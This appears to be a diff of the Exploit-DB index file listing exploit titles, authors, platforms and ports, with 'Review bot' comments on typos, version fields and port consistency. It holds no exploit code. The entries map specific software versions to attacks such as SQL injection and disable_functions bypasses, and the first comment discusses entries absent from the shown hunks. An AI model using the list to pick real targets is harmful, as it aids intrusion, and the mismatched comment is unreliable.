Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
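Review bot: The description for 45867 reads `Webkit (Chome < 61)` — a typo for `Chrome` that will break searches for the entry; the line should be `45867,exploits/multiple/local/45867.txt,"Webkit (Chrome < 61) - 'MHTML' Universal Cross-site Scripting",…`. The 45865 description pins the imap_open disable_functions bypass to `PHP 5.2.3`, which looks like an inherited version string; if the entry covers the Debian `imap` extension behaviour it presumably applies to later PHP branches too, and the version field should match what the file actually claims. 45866/45867 are browser UXSS issues filed under `local`/`multiple`, which is worth a second look against how other browser entries are typed.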
@@ -35094,7 +35098,7 @@ id,file,description,date,author,type,platform,port 35142,exploits/php/webapps/35142.txt,"Social Share - 'search' Cross-Site Scripting",2010-12-23,"Aliaksandr Hartsuyeu",webapps,php, 35143,exploits/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals - 'PageId' SQL Injection",2010-12-28,"non customers",webapps,php, 35145,exploits/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' SQL Injection",2010-12-27,Dr.NeT,webapps,php, -35146,exploits/php/webapps/35146.txt,"PHP < 5.6.2 - 'Shellshock' 'disable_functions()' Bypass Command Injection",2014-11-03,"Ryan King (Starfall)",webapps,php, +35146,exploits/php/webapps/35146.txt,"PHP < 5.6.2 - 'Shellshock' Safe Mode / Disable Functions Bypass / Command Injection",2014-11-03,"Ryan King (Starfall)",webapps,php, 35149,exploits/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",webapps,php, 35150,exploits/php/webapps/35150.php,"Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)",2014-11-03,"Stefan Horst",webapps,php,443 35155,exploits/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,webapps,php, 
@@ -36936,7 +36940,7 @@ id,file,description,date,author,type,platform,port 38115,exploits/php/webapps/38115.txt,"SimpleInvoices invoices Module - Customer Field Cross-Site Scripting",2012-12-10,tommccredie,webapps,php, 38118,exploits/xml/webapps/38118.txt,"Qlikview 11.20 SR11 - Blind XML External Entity Injection",2015-09-09,"Alex Haynes",webapps,xml, 38119,exploits/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - Cross-Site Request Forgery",2015-09-09,"Aryan Bayaninejad",webapps,php, -38127,exploits/php/webapps/38127.php,"PHP 5.5.9 - CGIMode FPM WriteProcMemFile Bypass Disable Function",2015-09-10,ylbhz,webapps,php, +38127,exploits/php/webapps/38127.php,"PHP 5.5.9 - 'zend_executor_globals' 'CGIMode FPM WriteProcMemFile' Disable Functions Bypass / Load Dynamic Library",2015-09-10,ylbhz,webapps,php, 38128,exploits/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",webapps,cgi,5000 38129,exploits/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",webapps,php, 38130,exploits/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,webapps,java, 
@@ -37715,7 +37719,7 @@ id,file,description,date,author,type,platform,port 39761,exploits/php/webapps/39761.txt,"WordPress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting",2016-05-04,"Johto Robbie",webapps,php,80 39762,exploits/cgi/webapps/39762.txt,"NetCommWireless HSPA 3G10WVE Wireless Router - Multiple Vulnerabilities",2016-05-04,"Bhadresh Patel",webapps,cgi,80 39765,exploits/cgi/webapps/39765.txt,"IPFire < 2.19 Core Update 101 - Remote Command Execution",2016-05-04,"Yann CAM",webapps,cgi, -39766,exploits/php/webapps/39766.php,"PHP Imagick 3.3.0 - disable_functions Bypass",2016-05-04,RicterZ,webapps,php, +39766,exploits/php/webapps/39766.php,"Imagick 3.3.0 (PHP 5.4) - Disable Functions Bypass",2016-05-04,RicterZ,webapps,php, 39777,exploits/asp/webapps/39777.txt,"DotNetNuke 07.04.00 - Administration Authentication Bypass",2016-05-06,"Marios Nicolaides",webapps,asp,80 39780,exploits/jsp/webapps/39780.txt,"ManageEngine Applications Manager Build 12700 - Multiple Vulnerabilities",2016-05-06,"Saif El-Sherei",webapps,jsp,443 39781,exploits/php/webapps/39781.txt,"Ajaxel CMS 8.0 - Multiple Vulnerabilities",2016-05-09,DizzyDuck,webapps,php,80 
@@ -40367,3 +40371,15 @@ id,file,description,date,author,type,platform,port 45856,exploits/php/webapps/45856.txt,"Pedidos 1.0 - SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80 45857,exploits/php/webapps/45857.txt,"Electricks eCommerce 1.0 - Persistent Cross-Site Scripting",2018-11-14,"Nawaf Alkeraithe",webapps,php,80 45858,exploits/php/webapps/45858.txt,"DoceboLMS 1.2 - SQL Injection / Arbitrary File Upload",2018-11-14,"Ihsan Sencan",webapps,php,80 +45860,exploits/php/webapps/45860.txt,"Precurio Intranet Portal 2.0 - Cross-Site Request Forgery (Add Admin)",2018-11-15,"Ihsan Sencan",webapps,php,80 +45861,exploits/php/webapps/45861.txt,"PHP-Proxy 5.1.0 - Local File Inclusion",2018-11-15,"Ameer Pornillos",webapps,php,80 +45862,exploits/php/webapps/45862.txt,"BitZoom 1.0 - 'rollno' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80 +45863,exploits/php/webapps/45863.txt,"Net-Billetterie 2.9 - 'login' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80 +45864,exploits/php/webapps/45864.txt,"Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80 +45868,exploits/php/webapps/45868.txt,"EverSync 0.5 - Arbitrary File Download",2018-11-15,"Ihsan Sencan",webapps,php,80 +45875,exploits/php/webapps/45875.txt,"Meneame English Pligg 5.8 - 'search' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80 +45876,exploits/php/webapps/45876.txt,"Kordil EDMS 2.2.60rc3 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php, +45877,exploits/php/webapps/45877.txt,"Simple E-Document 1.31 - 'username' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php, +45878,exploits/php/webapps/45878.txt,"2-Plan Team 1.0.4 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php, +45879,exploits/php/webapps/45879.txt,"PHP Mass Mail 1.0 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php, +45880,exploits/php/webapps/45880.txt,"Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting",2018-11-15,MTK,webapps,php,
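Review bot: The port column is inconsistent within this hunk: 45860–45875 are added with `,80` while 45876–45880 end with an empty port, e.g. `45878,exploits/php/webapps/45878.txt,"2-Plan Team 1.0.4 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,`, although all are PHP web-application entries reached over HTTP in their PoCs; either fill in `80` for the last five or leave the field empty for all of them. 45878 and 45880 are also authenticated issues by their PoCs (session cookie on the upload; `/wp-admin/` endpoint for the XSS), and the descriptions would be more accurate with `(Authenticated)` added, matching entries such as 45089 elsewhere in this file.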